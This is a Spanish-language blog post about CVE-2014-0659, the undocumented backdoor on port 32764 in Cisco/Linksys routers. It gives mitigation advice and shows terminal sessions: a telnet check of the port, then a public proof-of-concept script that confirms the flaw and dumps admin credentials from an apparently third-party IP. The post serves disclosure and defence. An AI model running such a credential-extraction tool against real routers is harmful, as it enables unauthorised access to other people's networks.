sábado, 25 de enero de 2014

CVE-2014-0659 bug or backdor? Equipos cisco en problemas

"Undocumented Test Interface in Cisco Small Business Devices" dijo cisco hace unos pocos días en http://tools.cisco.com/security/center/viewAlert.x?alertId=32381 . Al parecer los desarrolladores de firmware de varios de sus Routers/AP se olvidaron de retirar esta ""feature"" de test no documentada antes de lanzarlos al mercado.

Lo que resulta mas gracioso de todo esto es que uno de los primeros (sino el primero) de los reportes sobre este comportamiento extraño (puerto 32764 TCP abierto) fue anunciado en Julio de 2010, mas de 3 años atrás! y paso perfectamente desapercibido hasta fines del año pasado. Claro, al menos eso creemos ajja.

En la pasada navidad, el francés (Eloi Vanderbeken) se vio sorprendido por un puerto abierto en su router Linksys WAG200G y realizó un interesante trabajo para explotar esta interfaz de testing, logrando un pulido y potente exploit para una gran cantidad de los equipos afectados.

La explicación de cómo encontró el "bug" y el desarrollo del exploit lo pueden ver desde aquí, si tienen tiempo lean el PDF, es una mezcla de humor bizarro y hacking jajaj.

Las recomendaciones para quienes tengan alguno de los equipos listados en el primer link:

  • Proteger el acceso al router mediante un firewall, inclusive podría ser el mismo firewall que trae el equipo.
  • Actualizar a la brevedad el firmware (al día de hoy, cisco no liberó una actualización que corrija el problema, según indican se liberará el parche a fines de enero).
Una prueba sencilla (aunque no completa) para ver si nuestro router es vulnerable es intentar conectarse al puerto 32764 con telnet por ejemplo:

-no vulnerable

juan@moon:~$ telnet 192.168.1.1 32764
Trying 192.168.1.1...
telnet: Unable to connect to remote host: Connection refused
juan@moon:~$ 

-posiblemente vulnerable

juan@moon:~$ telnet 190.151.X.X 32764
Trying 190.151.X.X...
Connected to 190.151.X.X.
Escape character is '^]'.

ScMM��Connection closed by foreign host.
juan@moon:~$ 

Para corroborar la vulnerabilidad se puede utilizar el exploit, poc.py:

juan@moon:~/Escritorio$ python poc.py --ip 190.151.X.X
190.151.X.X:32764 is vulnerable!
juan@moon:~/Escritorio$ 

Y si todavía tienen dudas, vean las credenciales de administración

juan@moon:~/Escritorio$ python poc.py --ip 190.151.X.X --get_credentials
log_login_fail:0
log_login_success:0
login_password:xxxxxxx
login_username:xxxxxxx
juan@moon:~/Escritorio$ 

En fin, si tienen alguno de esos equipos, estén atentos a la actualización que debería liberar cisco en estos días! 

Saludos!
Publicado por en
Etiquetas: , , , , , , , , ,

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)